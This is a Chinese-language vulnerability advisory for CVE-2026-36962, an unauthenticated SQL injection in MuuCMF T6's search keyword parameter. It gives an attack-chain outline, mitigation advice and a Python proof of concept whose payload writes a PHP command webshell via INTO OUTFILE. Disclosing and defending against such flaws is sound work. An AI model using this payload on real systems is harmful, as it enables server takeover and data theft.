CVE-2026-36962 CVSS 7.3 高危

CVE-2026-36962 MuuCMF T6 SQL注入漏洞

披露日期: 2026-05-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36962

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MuuCMF T6

漏洞概述

MuuCMF T6 v1.9.4.20260115版本存在SQL注入漏洞。由于/index/controller/Search.php接口中的keyword参数未经过滤，未经身份验证的攻击者可利用该漏洞执行恶意SQL语句。这不仅会导致数据库信息泄露，还可能导致整个数据库被控制，攻击者可进一步获取管理员权限，甚至通过写入恶意文件实现远程代码执行，对服务器安全构成严重威胁。

技术细节

该漏洞的根源在于MuuCMF T6系统在处理搜索功能时存在输入验证缺失。具体位于`/index/controller/Search.php`文件中，程序接收前端传递的`keyword`参数后，未经过任何安全过滤或转义处理，直接将其拼接到数据库查询语句中执行。攻击者可以利用这一缺陷，构造包含恶意SQL代码的Payload（例如使用UNION SELECT联合查询语句）。由于无需身份验证，攻击者可远程发起攻击。利用该漏洞，攻击者不仅能提取数据库中的敏感信息（如管理员账号密码），还能利用MySQL数据库的`INTO OUTFILE`特性，将包含恶意代码的PHP文件写入服务器Web目录，从而获得WebShell，实现远程代码执行（RCE）和完全的服务器控制权。

攻击链分析

STEP 1

侦察

识别运行MuuCMF T6 v1.9.4.20260115的目标服务器。

STEP 2

漏洞探测

向/index/controller/Search.php发送包含特殊字符的请求，验证keyword参数是否存在SQL注入。

STEP 3

SQL注入利用

构造恶意SQL Payload，通过UNION SELECT语句提取数据库敏感信息或尝试写入文件。

STEP 4

获取权限

利用INTO OUTFILE写入WebShell，获取服务器远程代码执行权限。

STEP 5

维持控制

通过WebShell执行系统命令，进一步横向移动或植入后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

def exploit_sqli(target_url):
    """
    PoC for CVE-2026-36962 SQL Injection in MuuCMF T6.
    Attempts to write a webshell via SQL Injection.
    """
    # Vulnerable endpoint
    endpoint = "/index/controller/Search.php"
    
    # Malicious payload to write a PHP shell
    # Note: This requires the MySQL user to have FILE privileges and known web root
    payload = "?keyword=test' UNION SELECT 1,2,3,4,'<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'-- -"
    
    full_url = target_url + endpoint + payload
    
    try:
        response = requests.get(full_url, timeout=10)
        if response.status_code == 200:
            print(f"[+] Payload sent to {full_url}")
            print("[+] Check if shell.php was created at /var/www/html/shell.php")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://example.com"
    exploit_sqli(target)

影响范围

MuuCMF T6 v1.9.4.20260115

防御指南

临时缓解措施

建议立即升级至官方最新安全版本。若无法升级，应在WAF（Web应用防火墙）层面对/index/controller/Search.php接口的keyword参数实施严格的SQL注入规则过滤，拦截包含UNION、SELECT、单引号等特征的恶意流量。同时，限制数据库用户的文件写入权限（FILE权限），防止攻击者通过SQL注入写入WebShell。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-36962
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-36962
3 Details https://www.cvedetails.com/cve/CVE-2026-36962/
4 VulDB https://vuldb.com/cve/CVE-2026-36962
5 Link https://gitee.com/dameng100/muucmf
6 Link https://thinhneee.github.io/posts/muucmf-sqli/
7 Link https://thinhneee.github.io/posts/muucmf-sqli/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表